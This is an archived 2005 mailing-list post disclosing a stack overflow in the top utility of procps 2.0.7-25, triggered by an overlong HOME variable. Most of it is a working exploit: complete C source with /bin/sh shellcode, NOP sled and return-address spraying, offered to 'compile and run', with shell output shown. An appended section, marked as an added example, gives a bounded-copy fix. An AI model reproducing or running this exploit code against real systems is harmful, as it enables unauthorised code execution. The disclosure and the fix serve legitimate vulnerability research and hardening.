Vulnerability Development: top (procps-2.0.7-25) vulnerability

top (procps-2.0.7-25) vulnerability

From: WINNY THOMAS <winnymthomas_at_yahoo.com>
Date: Fri, 6 May 2005 21:30:19 -0700 (PDT)

While running top on a tool of mine to do a profiling
test, the top command ran into a segmentation fault. I
could find two instances where the command could
misbehave:
 
1. if you have junk data inside a
file .toprc in your home directory
2. if your environmental variable
HOME is set to a string that’s greater than 1024.
 
I managed to spawn a shell out of the top command by
exploiting the second issue. If you compile and run
the exploit code which I am including in the mail body
you will get a shell. In case you don't, you could pass
parameters to the program as follows to adjust the
offset.
The vulnerability detail is included in the code
comment.
 
[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 1001
sh-2.05b$ exit
exit
[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 120
Illegal instruction
[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 1010
sh-2.05b$ exit
exit
 
In most of the tests I did on the vulnerable code I got
a shell on my system without passing any parameter to
the program (that is, the hardcoded offset of 1111 in
my program worked well on my system).
 
/*
 * Program: Proof of concept code for top exploit
 * Author: Winny Thomas, Nevis networks pune
 * Vulnerability: in top.c the function get_options uses strcpy to copy the
 * value of the environment variable HOME into a static buffer that is
 * allocated on the stack. Hence it is possible to apply a standard stack
 * smashing attack to overwrite the return address on the stack and execute
 * code of the attacker's choice.
 * NOTE: top is not setuid and hence the exploit won't spawn a root shell.
 * Tested on Red Hat 8 with procps version 2.0.7-25. The problem has been
 * fixed in the latest versions.
 *
 * This code is for educational purpose only and the
 * author shall not bear any responsibility for any
 * damage caused by using this code
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen, strcat */
#include <unistd.h>     /* execl */
 
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
 
/* Value passed as HOME: 1200 bytes of return address / NOP sled / shellcode,
 * plus one byte so the string stays NUL-terminated for strcat(). */
char exploit_variable[1201];
 
/* Returns the current stack pointer (i386 only; the value is left in %eax). */
long get_esp(void)
{
        __asm__("movl %esp, %eax");
}
 
int main(int argc, char *argv[])
{
        long stackp, retaddr;
        char SETENV[1250];
        long *ptr;
        int i, j, offset = 1111;
 
        /* An optional first argument adjusts the offset from the current %esp. */
        if (argc > 1)
            offset = atoi(argv[1]);
 
        stackp = get_esp();
        retaddr = stackp - offset;
 
        /* Fill the whole buffer with the guessed return address. */
        ptr = (long *)exploit_variable;
        for (i = 0; i < 1200; i += 4)
            *ptr++ = retaddr;
 
        /* The first 600 bytes become a NOP sled ... */
        for (i = 0; i < 600; i++)
            exploit_variable[i] = '\x90';
 
        /* ... followed by the shellcode; the remaining return addresses stay. */
        for (j = 0; j < strlen(shellcode); j++, i++)
            exploit_variable[i] = shellcode[j];
        exploit_variable[1200] = '\0';
 
        sprintf(SETENV, "HOME=");
        strcat(SETENV, exploit_variable);
        putenv(SETENV);
        execl("/usr/bin/top", "top", (char *)0);
        return 1;       /* only reached if execl() fails */
}
 

                
Received on May 09 2005
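The root cause the post describes is an unbounded strcpy() of the HOME environment variable into a fixed-size stack buffer in get_options(). The following is an added example, not code from the post or from procps: a hypothetical reconstruction of that pattern next to a bounded replacement that measures HOME without scanning past the limit, checks that HOME plus "/.toprc" plus the terminating NUL fits, and fails closed otherwise. The 1024-byte buffer size is assumed from the post's observation that HOME values longer than 1024 trigger the crash; the function names and the "/.toprc" suffix are illustrative assumptions, and the long HOME values are constructed in the code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed stack buffer in get_options(); the post reports
 * crashes once HOME exceeds 1024 bytes, so that is the working assumption. */
#define RC_PATH_MAX 1024

/* Upper bound on the constructed sample HOME values below (arbitrary). */
#define SAMPLE_MAX 2048

/* The pattern the post describes (hypothetical reconstruction, not procps
 * code): an unbounded copy of an attacker-controlled environment variable
 * into a fixed-size buffer. Shown for contrast only; never called here. */
static void build_rc_path_unsafe(char out[RC_PATH_MAX], const char *home)
{
    strcpy(out, home);          /* no length check: writes past 'out' if HOME is long */
    strcat(out, "/.toprc");
}

/* Hardened form: bounded length measurement, explicit fit check, fail closed.
 * Rejecting is preferable to silent truncation, which would make the program
 * open a different file than the one the user configured. */
static int build_rc_path(char *out, size_t outsz, const char *home)
{
    static const char suffix[] = "/.toprc";   /* sizeof suffix includes the NUL */
    size_t hlen = 0;

    if (home == NULL || out == NULL)
        return -1;
    while (hlen < outsz && home[hlen] != '\0')   /* never scans past outsz */
        hlen++;
    if (hlen + sizeof suffix > outsz)
        return -1;                               /* would not fit: refuse */
    memcpy(out, home, hlen);
    memcpy(out + hlen, suffix, sizeof suffix);
    return 0;
}

/* Convenience wrapper with a static result buffer; NULL means HOME was rejected. */
static const char *rc_path_for(const char *home)
{
    static char path[RC_PATH_MAX];
    return build_rc_path(path, sizeof path, home) == 0 ? path : NULL;
}

/* Constructed test input: a HOME value consisting of n 'A' bytes. */
static const char *sample_home(size_t n)
{
    static char buf[SAMPLE_MAX];
    if (n >= SAMPLE_MAX)
        n = SAMPLE_MAX - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    const char *p;

    (void)build_rc_path_unsafe;   /* referenced only so the contrast function is kept */

    p = rc_path_for("/home/user");
    printf("short HOME     -> %s\n", p ? p : "rejected");

    p = rc_path_for(sample_home(1199));   /* same length as the post's payload */
    printf("1199-byte HOME -> %s\n", p ? p : "rejected");

    /* Reading HOME from the real environment, as get_options() does. */
    p = rc_path_for(getenv("HOME"));
    printf("this process   -> %s\n", p ? p : "rejected or unset");
    return 0;
}
```

The boundary is exact: a 1016-byte HOME plus the 7-byte suffix and the NUL fills the 1024-byte buffer and is accepted, while 1017 bytes or more is refused. The same check, applied in the real get_options(), turns the stack smash the post demonstrates into a clean error.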
